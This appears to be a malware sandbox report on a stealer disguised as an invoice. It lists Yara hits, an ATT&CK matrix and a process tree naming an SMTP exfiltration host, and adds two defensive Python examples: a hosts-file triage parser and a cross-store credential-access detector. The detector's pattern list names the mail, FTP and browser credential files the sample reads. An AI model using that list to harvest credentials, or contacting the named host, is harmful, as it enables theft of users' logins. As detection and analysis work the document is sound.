Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Queries volume information: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Queries volume information: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Queries volume information: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Overdue invoice.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\Overdue invoice.exe | File written: C:\Windows\System32\drivers\etc\hosts
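The report records that the sample wrote the hosts file but not what it wrote. The following is an added triage example (editor's code, not the sample's and not part of the Joe Sandbox report): it parses a hosts file, separates the stock loopback lines from overrides, and classifies each override as a sinkhole (name pointed at loopback or 0.0.0.0, the usual way a stealer cuts off AV update and telemetry hosts) or a redirect to some other address. The hosts content below is constructed, and the av-vendor.example and bank.example names are placeholders.

```python
"""Triage check for a modified Windows hosts file.

Added example for this report (editor's code, not the sample's or Joe
Sandbox's). The report shows the sample writing
C:\\Windows\\System32\\drivers\\etc\\hosts but not what it wrote; this parser
lists every override and says whether it sinkholes a name or redirects it.
"""
import ipaddress
import re
from typing import List, NamedTuple, Tuple


class HostsEntry(NamedTuple):
    lineno: int
    ip: str
    names: Tuple[str, ...]


# The only mappings a stock Windows hosts file carries (normally commented
# out; some tooling uncomments them). Anything else is a local override.
STOCK = {("127.0.0.1", ("localhost",)), ("::1", ("localhost",))}


def parse_hosts(text: str) -> List[HostsEntry]:
    """Return every active (non-comment) mapping with its 1-based line number."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()  # drop trailing comments
        if not line:
            continue
        fields = re.split(r"\s+", line)
        entries.append(HostsEntry(lineno, fields[0], tuple(n.lower() for n in fields[1:])))
    return entries


def classify(entry: HostsEntry) -> str:
    """'blocked' when the name is sinkholed to loopback/0.0.0.0, 'redirected'
    when it points at any other address (a phishing or MITM target),
    'malformed' when the address does not parse at all."""
    try:
        addr = ipaddress.ip_address(entry.ip)
    except ValueError:
        return "malformed"
    return "blocked" if addr.is_loopback or addr.is_unspecified else "redirected"


def suspicious_entries(text: str) -> List[Tuple[HostsEntry, str]]:
    """Every non-stock mapping, paired with its classification."""
    return [(e, classify(e)) for e in parse_hosts(text) if (e.ip, e.names) not in STOCK]


# Constructed sample (not taken from the report): a stock header followed by
# the kind of lines a stealer adds. The hostnames are placeholders.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#\t127.0.0.1       localhost
#\t::1             localhost
127.0.0.1 localhost
0.0.0.0 updates.av-vendor.example   # sinkholed
127.0.0.1 telemetry.av-vendor.example
198.51.100.7 login.bank.example
"""

if __name__ == "__main__":
    for entry, kind in suspicious_entries(SAMPLE_HOSTS):
        print(f"line {entry.lineno}: {entry.ip} -> {', '.join(entry.names)} [{kind}]")
```

On a live host, read C:\Windows\System32\drivers\etc\hosts and feed it to suspicious_entries(); an empty result means only the stock loopback lines are active. A "redirected" entry deserves more urgency than a "blocked" one, since it steers the user to an address the attacker chose rather than merely silencing a vendor.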

                    Stealing of Sensitive Information

Source: Yara match | File source: 16.2.yqWDN.exe.3de2e78.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.0.yqWDN.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.0.yqWDN.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.yqWDN.exe.3de2e78.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.Overdue invoice.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.Overdue invoice.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.yqWDN.exe.3e72e78.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.Overdue invoice.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.yqWDN.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.0.yqWDN.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.Overdue invoice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.0.yqWDN.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.Overdue invoice.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.0.yqWDN.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Overdue invoice.exe.3ac2e78.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.Overdue invoice.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.yqWDN.exe.3e72e78.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.yqWDN.exe.3d8e3f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.yqWDN.exe.3cfe3f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Overdue invoice.exe.3ac2e78.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Overdue invoice.exe.39de3f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000013.00000000.366458580.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.519470076.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.294988702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.295945880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000000.366994504.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.295465407.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.294210578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.378013888.0000000003CEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000000.365073156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000000.365965578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.519516875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.302129408.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.373874318.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.300706050.000000000393F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Overdue invoice.exe PID: 6504, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Overdue invoice.exe PID: 7140, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: yqWDN.exe PID: 5496, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: yqWDN.exe PID: 7048, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: yqWDN.exe PID: 5572, type: MEMORYSTR
Source: C:\Users\user\Desktop\Overdue invoice.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\Overdue invoice.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\Overdue invoice.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\Overdue invoice.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\Overdue invoice.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match | File source: 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Overdue invoice.exe PID: 7140, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: yqWDN.exe PID: 5572, type: MEMORYSTR
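The file and registry opens above are the observable core of the stealer: one process walks mail, FTP and browser credential stores that belong to unrelated vendors. The following is an added detection example (editor's code, not the sample's and not part of the Joe Sandbox report). The store paths and registry keys are the ones the report shows being opened; the event record shape and the events themselves are constructed stand-ins for Sysmon/EDR file- and registry-open telemetry, and the benign process names and PIDs are invented. The rule it implements is the cross-kind one: a single store hit is normal (a mail client reads its own profile), but one process touching two or more kinds of store is flagged.

```python
"""Detection logic for cross-application credential-store harvesting.

Added example for this report (editor's code, not the sample's or Joe
Sandbox's). The store paths and registry keys are the ones the report shows
the sample opening; the event record shape and the events themselves are
constructed stand-ins for Sysmon/EDR file- and registry-open telemetry.
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, NamedTuple, Optional, Tuple


class AccessEvent(NamedTuple):
    pid: int
    image: str
    target: str  # file path or registry key that was opened


# (store kind, client, pattern). Case-insensitive; the leading \\ anchors on a
# path separator so any profile directory or HKCU spelling matches.
CREDENTIAL_STORES: List[Tuple[str, str, str]] = [
    ("mail", "Thunderbird", r"\\Thunderbird\\profiles\.ini$"),
    ("mail", "Outlook", r"\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"),
    ("mail", "IncrediMail", r"\\IncrediMail\\Identities$"),
    ("ftp", "WinSCP", r"\\Martin Prikryl\\WinSCP 2\\Sessions$"),
    ("ftp", "SmartFTP", r"\\SmartFTP\\Client 2\.0\\Favorites"),
    ("ftp", "FileZilla", r"\\FileZilla\\recentservers\.xml$"),
    ("browser", "Firefox", r"\\Mozilla\\Firefox\\profiles\.ini$"),
    ("browser", "Chrome", r"\\Google\\Chrome\\User Data\\[^\\]+\\Login Data$"),
]
_COMPILED = [(kind, client, re.compile(pat, re.IGNORECASE)) for kind, client, pat in CREDENTIAL_STORES]


def match_store(target: str) -> Optional[Tuple[str, str]]:
    """(kind, client) if `target` is a known credential store, else None."""
    for kind, client, rx in _COMPILED:
        if rx.search(target):
            return kind, client
    return None


def score_processes(events: Iterable[AccessEvent], min_kinds: int = 2) -> Dict[int, dict]:
    """Processes that opened credential stores of at least `min_kinds` kinds.

    A mail client reads its own profile and a browser its own Login Data, so
    a single store hit is normal. One process touching mail, FTP and browser
    stores in succession has no benign explanation; that is the pattern the
    report records for yqWDN.exe and the injected Overdue invoice.exe.
    """
    seen: Dict[int, dict] = defaultdict(lambda: {"image": "", "clients": set(), "kinds": set()})
    for ev in events:
        hit = match_store(ev.target)
        if hit is None:
            continue
        kind, client = hit
        rec = seen[ev.pid]
        rec["image"] = ev.image
        rec["clients"].add(client)
        rec["kinds"].add(kind)
    return {pid: rec for pid, rec in seen.items() if len(rec["kinds"]) >= min_kinds}


# Constructed events: the stealer's PID and targets mirror the report; the
# benign processes are invented to show that single-store access is not flagged.
SAMPLE_EVENTS = [
    AccessEvent(5572, "yqWDN.exe", r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"),
    AccessEvent(5572, "yqWDN.exe", r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"),
    AccessEvent(5572, "yqWDN.exe", r"HKEY_CURRENT_USER\Software\IncrediMail\Identities"),
    AccessEvent(5572, "yqWDN.exe", r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"),
    AccessEvent(5572, "yqWDN.exe", r"C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect"),
    AccessEvent(5572, "yqWDN.exe", r"C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml"),
    AccessEvent(5572, "yqWDN.exe", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
    AccessEvent(5572, "yqWDN.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    AccessEvent(1240, "chrome.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    AccessEvent(2208, "thunderbird.exe", r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"),
    AccessEvent(3100, "notepad.exe", r"C:\Users\user\Documents\notes.txt"),
]

if __name__ == "__main__":
    for pid, rec in score_processes(SAMPLE_EVENTS).items():
        print(f"pid {pid} ({rec['image']}): {sorted(rec['kinds'])} via {sorted(rec['clients'])}")
```

Set min_kinds=1 to get an inventory of every process that read any store (useful for building a per-host baseline); the default of 2 is the alerting threshold, since the cross-vendor pattern is what separates a stealer from the applications that legitimately own these files.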

                    Remote Access Functionality

Source: Yara match | File source: 16.2.yqWDN.exe.3de2e78.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.0.yqWDN.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.0.yqWDN.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.yqWDN.exe.3de2e78.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.Overdue invoice.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.Overdue invoice.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.yqWDN.exe.3e72e78.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.Overdue invoice.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.yqWDN.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.0.yqWDN.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.Overdue invoice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.0.yqWDN.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.Overdue invoice.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.0.yqWDN.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Overdue invoice.exe.3ac2e78.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.Overdue invoice.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.yqWDN.exe.3e72e78.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.yqWDN.exe.3d8e3f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.yqWDN.exe.3cfe3f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Overdue invoice.exe.3ac2e78.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Overdue invoice.exe.39de3f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000013.00000000.366458580.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.519470076.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.294988702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.295945880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000000.366994504.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.295465407.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.294210578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.378013888.0000000003CEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000000.365073156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000000.365965578.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.519516875.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.302129408.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.373874318.0000000003C5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.300706050.000000000393F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.522484179.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.521991645.0000000003401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Overdue invoice.exe PID: 6504, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Overdue invoice.exe PID: 7140, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: yqWDN.exe PID: 5496, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: yqWDN.exe PID: 7048, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: yqWDN.exe PID: 5572, type: MEMORYSTR
MITRE ATT&CK matrix (rebuilt per tactic column from the flattened extraction). Bracketed digits are the report's hit-count badges for that technique, kept as extracted; techniques without a badge are the matrix's unmatched placeholders.

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application
Execution: Windows Management Instrumentation [211], Scheduled Task/Job [1], At (Linux), At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter, PowerShell
Persistence: Scheduled Task/Job [1], Registry Run Keys / Startup Folder [1], Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux)
Privilege Escalation: Process Injection [111], Scheduled Task/Job [1], Registry Run Keys / Startup Folder [1], Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux)
Defense Evasion: File and Directory Permissions Modification [1], Disable or Modify Tools [1], Deobfuscate/Decode Files or Information [1], Obfuscated Files or Information [2], Software Packing [3], Masquerading [1], Virtualization/Sandbox Evasion [131], Process Injection [111], Hidden Files and Directories [1]
Credential Access: OS Credential Dumping [2], Input Capture [1], Credentials in Registry [1], NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow
Discovery: File and Directory Discovery [1], System Information Discovery [114], Query Registry [1], Security Software Discovery [311], Process Discovery [1], Virtualization/Sandbox Evasion [131], Application Window Discovery [1], Remote System Discovery [1], System Network Connections Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot, Software Deployment Tools
Collection: Archive Collected Data [11], Data from Local System [2], Email Collection [1], Input Capture [1], Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel [1], Non-Standard Port [1], Non-Application Layer Protocol [1], Application Layer Protocol [11], Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
Behavior Graph ID: 635084 | Sample: Overdue invoice.exe | Startdate: 27/05/2022 | Architecture: WINDOWS | Score: 100

Rebuilt from the flattened graph dump; node labels, file types and counters are the report's own (the numbers after a process name are its created-file / registry-value counters, see Legend). Truncated paths ("...") are as the report shows them.

Top-level signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures

Process tree:
- Overdue invoice.exe (6), started
  - Dropped: C:\Users\user\AppData\...\dYXeRswtYBrq.exe (PE32); C:\Users\user\AppData\Local\...\tmpA306.tmp (XML); C:\Users\user\...\Overdue invoice.exe.log (ASCII)
  - Signature: Injects a PE file into a foreign processes
  - Child: Overdue invoice.exe (2 5), started
    - Network: mail.jkudyog.com 206.183.111.188, ports 49715, 49745, 587, WEBWERKS-AS-IN WebWerksIndiaPvtLtdIN, United States (TCP 587 is the SMTP submission port, consistent with the mail.* host name and the mail-credential theft signatures)
    - Dropped: C:\Users\user\AppData\Roaming\...\yqWDN.exe (PE32); C:\Windows\System32\drivers\etc\hosts (ASCII); C:\Users\user\...\yqWDN.exe:Zone.Identifier (ASCII)
    - Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Modifies the hosts file; Hides that the sample has been downloaded from the Internet (zone.identifier)
  - Child: schtasks.exe (1), started
    - Child: conhost.exe, started
  - Child: Overdue invoice.exe, started
- yqWDN.exe (5), started
  - Network: 192.168.2.1 unknown unknown
  - Signatures: Multi AV Scanner detection for dropped file; Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Machine Learning detection for dropped file; Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
  - Child: yqWDN.exe (2), started
    - Signatures: Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
  - Child: schtasks.exe (1), started
    - Child: conhost.exe, started
- yqWDN.exe (2), started

                    SourceDetectionScannerLabelLink
                    Overdue invoice.exe61%VirustotalBrowse
                    Overdue invoice.exe60%ReversingLabsByteCode-MSIL.Trojan.RealProtect
                    Overdue invoice.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\dYXeRswtYBrq.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\dYXeRswtYBrq.exe60%ReversingLabsByteCode-MSIL.Trojan.RealProtect
